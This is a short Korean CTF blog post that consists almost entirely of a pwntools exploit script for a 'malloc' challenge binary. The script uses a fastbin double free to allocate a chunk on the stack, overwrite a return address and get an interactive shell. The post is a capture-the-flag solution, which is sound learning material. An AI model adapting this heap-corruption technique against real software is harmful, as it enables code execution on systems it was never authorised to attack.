728x90
fastbin dup into stack으로 쓱싹!!!
from pwn import *
s = process("./malloc")
elf = ELF("./malloc")
def malloc(size,content):
s.recvuntil("> ")
s.sendline("1")
s.recvuntil("Enter size :")
s.sendline(str(size))
s.recvuntil("Enter data : ")
s.sendline(content)
def free(index):
s.recvuntil("> ")
s.sendline("2")
s.recvuntil("free :")
s.sendline(str(index))
def list():
s.recvuntil("> ")
s.sendline("3")
def modify(index,content):
s.recvuntil("> ")
s.sendline("4")
s.recvuntil("modify : ")
s.sendline(str(index))
s.recvuntil("data : ")
s.sendline(content)
def quit():
s.recvuntil("> ")
s.sendline("5")
gdb.attach(s)
s.recvuntil("Stack Address : ")
stack = int(s.recv(14),16)
print "stack : " + hex(stack)
malloc(32,"A"*8)
malloc(32,"B"*8)
free(1)
free(2)
free(1)
modify(1,p64(stack-0x58))
malloc(32,"C"*8)
malloc(49,"A"*24+p64(0x0000000000400986))
s.interactive()
'PWN > CTF' 카테고리의 다른 글
| [HITCON 2016] house_of_orange (0) | 2019.08.13 |
|---|---|
| [WITHCON 2016] normal malloc (0) | 2019.02.26 |
| [Hackingcamp 19] ucanfind (0) | 2019.02.20 |
| [Hackingcamp 19] guess (0) | 2019.02.20 |
| [Hackingcamp 19] Orange (0) | 2019.02.20 |